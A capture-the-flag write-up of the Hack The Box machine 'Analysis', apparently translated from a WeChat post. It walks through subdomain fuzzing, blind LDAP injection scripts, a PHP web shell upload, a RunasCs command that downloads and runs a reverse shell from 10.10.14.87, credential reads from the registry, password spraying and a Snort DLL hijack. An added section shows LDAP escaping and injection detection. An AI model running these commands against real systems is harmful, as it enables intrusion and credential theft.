Scan the target
nmap -A 10.10.11.250
From the scan this looks like a domain controller (LDAP and port 88/Kerberos are open), so add the default domain name analysis.htb to the hosts file
echo "10.10.11.250 Analysis.htb" | sudo tee -a /etc/hosts
Then open it in a browser
It is just a static page with nothing on it, so fuzz for subdomains
wfuzz -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u http://analysis.htb/ -H "Host: FUZZ.analysis.htb" --hc 404
The fuzz turns up an internal subdomain; add it to hosts and visit it
It returns 403 (insufficient permissions), so scan directories with gobuster, which I have not used for a while...
gobuster dir -u http://internal.analysis.htb/dashboard -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 50 -x php,txt
The scan reveals a backend login page:
http://internal.analysis.htb/employees/login.php, let's take a look
Use the large username list from seclists: copy it to a folder of your choice, then edit it with sed (sed can edit many lines in one pass), appending "@analysis.htb" to every username line
cp /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt cxkuser.txt
sed -i "s|$|@analysis.htb|" cxkuser.txt
./kerbrute userenum -d analysis.htb cxkuser.txt --dc analysis.htb
Save the usernames that the fuzz found. Meanwhile, the directory scan earlier also turned up /users/list.php, so let's look at it
The page shows a "missing parameter" error, meaning list.php expects a parameter in the URL query string but did not receive one. Add the name parameter, using * as the wildcard: http://internal.analysis.htb/users/list.php?name=*
A table appears, and the known username is technician. Guessing that this is an LDAP query, we can enumerate it step by step, i.e. blind LDAP injection testing, with a script (the script was provided by a foreign researcher)
cxk.go:

```go
package main

import (
	"bufio"
	"fmt"
	"io"
	"net/http"
	"os"
	"strings"
)

// maxLen bounds the search: "*" is itself an LDAP wildcard, so if the charset
// contains it the injected filter matches on every pass and the loop would
// otherwise never terminate.
const maxLen = 64

func main() {
	// Prompt user for wordlist input
	fmt.Print("Enter the wordlist or charset (press Enter to use the default): ")
	scanner := bufio.NewScanner(os.Stdin)
	scanner.Scan()
	charsetPath := strings.TrimSpace(scanner.Text())
	// Use default wordlist if user didn't provide one
	if charsetPath == "" {
		charsetPath = "/usr/share/seclists/Fuzzing/alphanum-case-extra.txt"
	}

	// Read the charset once. The original seeked the file back to the start
	// after each hit, which a bufio.Scanner silently ignores because it has
	// already buffered the (small) file.
	chars, err := readLines(charsetPath)
	if err != nil {
		fmt.Println("Error reading charset file:", err)
		return
	}

	baseURL := "http://internal.analysis.htb/users/list.php?name=*)(%26(objectClass=user)(description={found_char}{FUZZ}*)"
	foundChars := ""
	for len(foundChars) < maxLen {
		matched := false
		for _, char := range chars {
			modifiedURL := strings.Replace(baseURL, "{FUZZ}", char, 1)
			modifiedURL = strings.Replace(modifiedURL, "{found_char}", foundChars, 1)
			fmt.Println("Modified URL:", modifiedURL)
			ok, err := probe(modifiedURL)
			if err != nil {
				fmt.Println("Error making HTTP request:", err)
				return
			}
			if ok {
				fmt.Println("Found character:", char)
				foundChars += char
				matched = true
				break // restart from the first candidate for the next position
			}
		}
		if !matched {
			break // no candidate extended the prefix: done
		}
	}
	fmt.Println("Final found characters:", foundChars)
}

// readLines returns the non-empty, trimmed lines of the charset file.
func readLines(path string) ([]string, error) {
	file, err := os.Open(path)
	if err != nil {
		return nil, err
	}
	defer file.Close()
	var lines []string
	scanner := bufio.NewScanner(file)
	for scanner.Scan() {
		if line := strings.TrimSpace(scanner.Text()); line != "" {
			lines = append(lines, line)
		}
	}
	return lines, scanner.Err()
}

// probe fetches url and reports whether the page still lists "technician",
// i.e. whether the injected filter matched that account.
func probe(url string) (bool, error) {
	response, err := http.Get(url)
	if err != nil {
		return false, err
	}
	defer response.Body.Close() // closed per request, not deferred until main exits
	body, err := io.ReadAll(response.Body)
	if err != nil {
		return false, err
	}
	return response.StatusCode == http.StatusOK && strings.Contains(string(body), "technician"), nil
}
```
The fuzz produced the value 97NTtl*, so the blind injection continues. The `)(` part closes the preceding LDAP search filter. `(%26(` is the URL-encoded form of `&(` (logical "AND"), used to combine several LDAP filter conditions. `(objectClass=user)` is an LDAP filter that restricts the search to objects of class "user". The `(description=*)` part uses the LDAP wildcard. This time the fuzzing is done with a Python script:
```python
import argparse
import requests


def main():
    # Parse command-line arguments
    parser = argparse.ArgumentParser(description="Brute-force script with optional proxy")
    parser.add_argument("-p", "--proxy", default="127.0.0.1:8080", help="Proxy address and port (default is 127.0.0.1:8080)")
    parser.add_argument("-w", "--wordlist", help="Path to the wordlist or charset file")
    args = parser.parse_args()
    # Fall back to the default charset file if the user did not provide one
    charset_path = args.wordlist if args.wordlist else "/usr/share/seclists/Fuzzing/alphanum-case-extra.txt"
    # Base URL containing the FUZZ and found_char placeholders
    base_url = "http://internal.analysis.htb/users/list.php?name=*)(%26(objectClass=user)(description=97NTtl*{found_char}{FUZZ})"
    found_chars = ""  # characters recovered so far
    skip_count = 6  # skip the first 6 encounters of the '*' candidate
    add_star = True  # flag controlling whether the literal '*' still has to be appended
    with open(charset_path, 'r') as file:
        for char in file:
            char = char.strip()
            # '*' is the LDAP wildcard and always matches: skip it for the first 6 passes
            if '*' in char and skip_count > 0:
                skip_count -= 1
                continue
            # On the next encounter append '*' once as a literal character
            if '*' in char and add_star:
                found_chars += char
                print("Found character:", char)
                add_star = False
                continue
            # Replace the placeholders and build the modified URL
            modified_url = base_url.replace("{FUZZ}", char).replace("{found_char}", found_chars)
            print("Modified URL:", modified_url)
            # Route the request through the proxy (e.g. Burp)
            proxies = {'http': args.proxy, 'https': args.proxy}
            response = requests.get(modified_url, proxies=proxies)
            # Check whether the response contains "technician" with status 200
            if "technician" in response.text and response.status_code == 200:
                print("Found character:", char)
                found_chars += char
                file.seek(0, 0)  # rewind the file to start another pass over the charset
    print("Final found characters:", found_chars)


if __name__ == "__main__":
    main()
```
http://internal.analysis.htb/users/list.php?name=*)(%26(objectClass=user)(description=97NTtl*4QP96Bv)
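The defensive side of the injection walked through above, as an added example that is not code from the page or from the HTB machine: RFC 4515 escaping of the user-supplied value before it is concatenated into the filter, and a check that flags request URLs whose name parameter carries filter syntax. The attribute sAMAccountName in the filter is an assumption, since the page does not show list.php's real filter.

```python
import re
from urllib.parse import parse_qs, urlparse

# Characters with special meaning inside an LDAP search filter (RFC 4515 section 3).
_ESCAPES = {"\\": r"\5c", "*": r"\2a", "(": r"\28", ")": r"\29", "\x00": r"\00"}


def escape_filter_value(value: str) -> str:
    """Escape a user-supplied value so the filter treats it as a literal string."""
    return "".join(_ESCAPES.get(ch, ch) for ch in value)


def build_filter_unsafe(name: str) -> str:
    """The pattern the injection relies on: raw concatenation of the name
    parameter into the filter (attribute sAMAccountName is an assumption)."""
    return f"(&(objectClass=user)(sAMAccountName={name}))"


def build_filter(name: str) -> str:
    """Hardened form: ')(', '&(' and '*' in the input can no longer alter the filter."""
    return f"(&(objectClass=user)(sAMAccountName={escape_filter_value(name)}))"


# Filter syntax characters that never belong in a plain user name.
_FILTER_SYNTAX = re.compile(r"[()\\]")


def looks_like_ldap_injection(url: str) -> bool:
    """Flag a request whose name parameter carries filter syntax (for log review or a WAF rule)."""
    params = parse_qs(urlparse(url).query, keep_blank_values=True)  # decodes %26 -> &
    return any(_FILTER_SYNTAX.search(v) for v in params.get("name", []))


if __name__ == "__main__":
    # Constructed sample: the page's final injected request next to two benign requests.
    payload = "*)(&(objectClass=user)(description=97NTtl*4QP96Bv)"
    print("unsafe  :", build_filter_unsafe(payload))
    print("escaped :", build_filter(payload))
    for u in [
        "http://internal.analysis.htb/users/list.php?name=*)(%26(objectClass=user)(description=97NTtl*4QP96Bv)",
        "http://internal.analysis.htb/users/list.php?name=*",
        "http://internal.analysis.htb/users/list.php?name=technician",
    ]:
        print(looks_like_ldap_injection(u), u)
```

In the PHP of list.php the same escaping is available as ldap_escape($name, '', LDAP_ESCAPE_FILTER) before the value is placed in the filter string.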
The fuzz successfully recovered the password 97NTtl*4QP96Bv; test the login with kerbrute
The test succeeds, so log straight into the backend
The Tickets tab lists many usernames
Note the usernames, then go to SOC Report, where files can be uploaded; upload a PHP command shell
The upload succeeds. gobuster found the upload path earlier, so access it directly
Then use the command shell to upload nc and simply click it
This gives a shell as svc_web directly. Searching around, the list.php source under C:\inetpub\internal\users contains the webservice password
$ldap_password = 'N1G6G46G@G!j';
$ldap_username = '[email protected]';
$ldap_connection = ldap_connect("analysis.htb");
This time upload the RunasCs tool, which lets you run commands and programs as another user. It is similar to the built-in Windows runas command, but with the advantage that it can be used in batch files or automation scripts to run tasks that need a different user's privileges. Combined with this script:
Invoke-ConPtyShell
you can get a shell as webservice directly
RunasCs.exe "webservice" "N1G6G46G@G!j" "powershell.exe -c IEX(IWR -UseBasicParsing 'http://10.10.14.87/Invoke-ConPtyShell.ps1'); Invoke-ConPtyShell -RemoteIp 10.10.14.87 -RemotePort 8080 -Rows 120 -Cols 38 -CommandLine cmd.exe" -d "analysis.htb"
Remember to use stty raw -echo; to fix the echo mode, otherwise the terminal is unusable. That gives analysis\webservice. Upload a shell, then use the PrivescCheck.ps1 script to look for privilege escalation paths; the password can also be read directly from the registry value
https://raw.githubusercontent.com/itm4n/PrivescCheck/master/PrivescCheck.ps1
reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
Collect the usernames that kerbrute enumerated earlier and validate them with crackmapexec
crackmapexec winrm 10.10.11.250 -u user.txt -p '7y4Z4^*y9Zzj'
That gives the user flag. Under C: there is a Snort folder; go into lib and check it with icacls
AUTORITE NT\Système (the French-locale name of NT AUTHORITY\SYSTEM) has full control. Snort is an open-source network intrusion detection system, and the Snort\lib\snort_dynamicpreprocessor directory holds the modules that extend Snort; custom modules can be added as well. So a DLL can be uploaded to replace the sf_engine.dll module there (a dynamic-link library), adding a module of our own
Then, after a long wait and some luck, it connects back automatically and the root flag is obtained
Originally published on the WeChat public account (Jiyou too beautiful): HTB-Analysis notes